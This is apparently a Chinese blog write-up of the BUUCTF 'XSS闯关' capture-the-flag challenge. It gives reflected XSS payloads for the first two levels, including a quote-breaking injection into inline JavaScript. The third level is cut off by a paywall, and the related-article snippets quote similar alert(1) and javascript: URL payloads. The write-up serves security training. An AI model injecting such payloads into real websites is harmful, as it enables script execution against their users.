BUUCTF [第二章 web进阶]XSS闯关

最新推荐文章于 2026-03-27 19:41:31 发布
原创 最新推荐文章于 2026-03-27 19:41:31 发布 · 2.1k 阅读 · 12
标签
#CTF
本文详细解读了六个阶段的XSS攻击,从URL篡改到利用编码技巧绕过过滤,涉及代码片段展示和解决方案。了解如何在实际场景中规避并理解此类安全威胁。

题目

第一关

这一关没有过滤直接修改url就行

?username=<script>alert('xss')</script>

第二关

这一题样式没什么变化直接上源码


<html lang="zh"><head>
    <meta charset="UTF-8">
    <title>XSS配套测试平台</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <link rel="stylesheet" href="/https://houtai.baidu.com/v2/csssdk">
    <script type="text/javascript" src="main.js"></script>
    <style>
        html, body, .app-wrapper {
            position: relative;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
        }
    </style>
</head>
<body>
    <div id="root" class="app-wrapper amis-scope"><div class="amis-routes-wrapper"><div class="a-Toast-wrap a-Toast-wrap--topRight"></div><div class="a-Page"><div class="a-Page-content"><div class="a-Page-main"><div class="a-Page-header"><h2 class="a-Page-title"><span class="a-TplField">XSS test platform</span></h2></div><div class="a-Page-body"><span class="a-TplField">
    	<div id="ccc">
    		
    	</div>
    </span></div></div></div></div></div></div>
    <script type="text/javascript">
    	if(location.search == ""){
    		location.search = "?username=xss"
    	}
    	var username = 'xss';
    	document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
    </script>

</body></html>

真正有用的地方,这里有个escape加密

<script type="text/javascript">
    	if(location.search == ""){
    		location.search = "?username=xss"
    	}
    	var username = 'xss';
    	document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
    </script>

url修改,我们把前面的username闭合,这样就可以直接执行后门的弹窗命令了

?username=';alert(1);'

第三关

还是直接上源码


                

        

         

    





  


        

            

                      
                        
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



              

                

              

            
              



	

		

			

				
					
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md

				
			

			

				

					08-10
				

			

		

		

			
				
一些关于xss的payload

			
		

	



              


  
              

                


	

		

			

				
					
BUUCTF刷题 XSS-Lab

				
			

			

				

					weixin_54438700的博客
				

				

					07-21
					
					2566
					
				

			

		

		

			
				
alert("XSS")>level 1中的JS代码alert("XSS")level 1中的JS代码alert("XSS")

			
		

	





	

		

			

				
					
BUUCTF中的xss闯关

					
最新发布

				
			

			

				

					i_u_k的博客
				

				

					03-27
					
					258
					
				

			

		

		

			
				
这个界面进去之后一直会在倒数结束后页面跳转,javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。看上述代码,username=后有单引号,我们需要先将其闭合,我们输入';autosubmit是一个开关,只要让他不等于false就可以进入if分支,不需要执行JS。//*JavaScript:浏览器会把JavaScript后面的内容当作命令执行。这一关我们先试着输入与第二关一样的,检查发现'被转义为\',所以。会被当成一整个字符串,

			
		

	



		

			
		



	

		

			

				
					
BUUCTF[第二章Web进阶]XSS闯关教程

				
			

			

				

					DMXA的博客
				

				

					11-01
					
					1106
					
				

			

		

		

			
				
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS

			
		

	





	

		

			

				
					
BuuCTF[第二章 web进阶]XSS闯关

				
			

			

				

					m_de_g的博客
				

				

					07-27
					
					7911
					
				

			

		

		

			
				
**
[第二章 web进阶]XSS闯关
**
一、解题思路
1.一来看了一下题目的说明

我们需要执行alert函数
那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关
http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script>


通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我

			
		

	





	

		

			

				
					
BUUCTF[第二章 web进阶]XSS闯关

				
			

			

				

					2301_78136321的博客
				

				

					09-26
					
					1116
					
				

			

		

		

			
				
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)

			
		

	





	

		

			

				
					
buuctf[第二章 web进阶]XSS闯关

				
			

			

				

					r133060的博客
				

				

					03-13
					
					458
					
				

			

		

		

			
				
查看使用说明可以知道我们要利用xss漏洞使用alert函数。

			
		

	





	

		

			

				
					
BUUCTF--[第二章 web进阶]XSS闯关

				
			

			

				

					m0_62908421的博客
				

				

					12-25
					
					1248
					
				

			

		

		

			
				
跨站脚本攻击 XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆 故将跨站脚本攻击缩写为 XSS。恶意攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页面时,嵌入 Web 里面的Script 代码会被执行,从而达到恶意攻击用户的目的。

			
		

	





	

		

			

				
					
BUUCTF XSS闯关1

				
			

			

				

					绘梨衣の沉默的博客。主要是CTF竞赛,网络安全,渗透测试,HVV,以及学习到的各种知识的分享
				

				

					04-18
					
					3124
					
				

			

		

		

			
				
使用'1闭合后面的单引号,当然也可以使用"//"将其注释,最终  username = alert(1);这段代码是一个简单的JavaScript脚本,其中包含一个alert函数调用,用于显示一个弹出框,内容为"xss"。javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。所以执行:autosubmit=1&action=JavaScript:alert(1);

			
		

	





	

		

			

				
					
[第二章 web进阶]XSS闯关

				
			

			

				

					qq_51558360的博客
				

				

					03-04
					
					2385
					
				

			

		

		

			
				
level1
?username=<script>alert(1)</script>


level2
查看源码

我们可以看到username被escape函数编码了,基本上就很难绕过。因此我们从username本身想办法。可以这样构造:
?username=';alert(1);//



这样username就是这样:
var username = ‘’;alert(1);//’;
成功执行了alert(1)。
level3
输入上一关的payload
题目源码,这次过滤了单引

			
		

	





	

		

			

				
					
BUUCT[极客挑战 2019]Havefun

				
			

			

				

					2203_75578846的博客
				

				

					04-09
					
					276
					
				

			

		

		

			
				
1.首先先观察题目和这网页,并没有什么奇特之处,那就查看源码,F12或者ctrl+ u,cat=dog就行,可以看到直接出flag。这段代码的作用是根据 URL 中的参数。这段代码首先从 URL 中获取参数。的值输出不同的内容。的值,并将其赋值给变量。

			
		

	





	

		

			

				
					
2025.2.5——三、[第二章 web进阶]XSS闯关 XSS|代码审计|符号转义|沙箱逃逸

				
			

			

				

					2402_87387800的博客
				

				

					02-06
					
					1392
					
				

			

		

		

			
				
题目来源:BUUCTF  [第二章 web进阶]XSS闯关

			
		

	





	

		

			

				
					
xss闯关

				
			

			

				

					2401_87790882的博客
				

				

					02-09
					
					1238
					
				

			

		

		

			
				
BUU上的。

			
		

	





	

		

			

				
					
CTFSHOW XSS漏洞

				
			

			

				

					qq_61553520的博客
				

				

					04-20
					
					604
					
				

			

		

		

			
				
这篇文章记录了我刷题的过程,是ctf.show上的XSS漏洞,第316-第333。

			
		

	





	

		

			

				
					
[BUUCT]REVERSE------findit

				
			

			

				

					BangSen1的博客
				

				

					01-29
					
					263
					
				

			

		

		

			
				
findit
apk文件,用apkide打开,找到findit文件

在里面没有找到flag的线索,纵观下来,只有这两串16进制比较奇怪。

转换一下,是flag的提示,那下一串应该就是flag了

得到了一串字符,提交之扣显示不正确,那应该被加密了,像这种变化 不会太的应该是凯撒加密。

第11解密得到了flag
flag{c164675262033b4c49bdf7f9cda28a75}

...

			
		

	





	

		

			

				
					
1.【BUUCTF】BUU XSS COURSE 11及XSS知识点

				
			

			

				

					2401_86760082的博客
				

				

					02-05
					
					1799
					
				

			

		

		

			
				
XSS知识点
XSS攻击类型
反射型XSS
存储型XSS
DOM 型XSS
XSS攻击危害
XSS攻击的注入点
检测XSS漏洞

			
		

	





	

		

			

				
					
前端安全系列:如何防止XSS攻击?

				
			

			

				

					琦彦
				

				

					01-25
					
					6098
					
				

			

		

		

			
				
前端安全 

随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的 XSS、CSRF 等安全问题之外,又时常遭遇网络劫持、非法调用 Hybrid API 等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-Site Cookies 等新技术来增强安全性,但是仍存在很多潜在的威胁,这...

			
		

	





	

		

			

				
					
BUUCTF-随便注(easy_sql)

				
			

			

				

					weixin_51383898的博客
				

				

					10-13
					
					1344
					
				

			

		

		

			
				
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。

			
		

	



              




          





        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
仲瑿

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值